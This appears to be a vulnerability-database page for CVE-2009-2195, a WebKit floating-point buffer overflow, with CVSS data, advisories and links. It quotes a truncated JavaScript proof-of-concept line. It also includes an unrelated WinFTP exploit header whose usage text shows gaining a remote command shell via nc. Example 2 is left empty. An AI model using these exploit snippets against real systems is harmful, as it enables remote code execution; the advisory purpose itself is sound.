CVE-2009-2195
published 2009-08-12
Priority P352 · critical · 9.3 · CVSS 2.0
AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 13.29% (95.9th percentile)
Buffer overflow in WebKit in Apple Safari before 4.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted floating-point numbers.
Affected
60 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | safari | <= 4.0.2 | — |
CVSS provenance
nvd · v2.0 · 9.3 · CRITICAL · AV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat · 9.3 · CRITICAL
Red Hat
WebKit: buffer overflow in floating point numbers parsing
vendor_redhat·2009-08-11·CVSS 9.3
CVE-2009-2195 [CRITICAL] WebKit: buffer overflow in floating point numbers parsing
GHSA
GHSA-g9rg-m48v-pqpf: Buffer overflow in WebKit in Apple Safari before 4
ghsa_unreviewed·2022-05-02
CVE-2009-2195 [HIGH] CWE-119 GHSA-g9rg-m48v-pqpf: Buffer overflow in WebKit in Apple Safari before 4
No detection rules found.
Exploit-DB
WebKit - Floating Point Number Remote Buffer Overflow
exploitdb·2009-08-11
CVE-2009-2195 WebKit - Floating Point Number Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/36023/info
WebKit is prone to a remote buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
Versions prior to Apple Safari 4.0.3 are vulnerable; other applications using WebKit may also be affected.
Example 1:
var Overflow = "31337" + 0.313373133731337313373133731337...;
Example 2:
Exploit-DB
WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow
exploitdb·2009-01-26
CVE-2009-0351 WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow
---
#!/usr/bin/perl
#
# WinFTP 2.3.0 post-auth remote exploit. (www.wftpserver.com)
#
################################################################################
# #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl #
# #
# Usage: winftp-remote.pl #
# #
# Target: 1 -> Win2k #
# Target: 2 -> WinXP sp2/3 (DoS only) #
# #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl 10.0.0.5 user1 pass1 1 #
# #
# [=] Connected. #
# [=] Sending user user1 #
# [=] Sending pass pass1 #
# [=] Sending payload... #
# [=] Done. You should have a command shell on port 7777. #
# #
# root@halcyon:~/Exploits/WinFTP# nc 10.0.0.5 7777 #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-1999 Microsoft Corp. #
# #
#
http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.html
http://lists.apple.com/archives/security-announce/2010/Jun/msg00003.html
http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.html
http://secunia.com/advisories/43068
http://support.apple.com/kb/HT3733
http://support.apple.com/kb/HT4225
http://www.securityfocus.com/bid/36023
http://www.securitytracker.com/id?1022717
http://www.vupen.com/english/advisories/2011/0212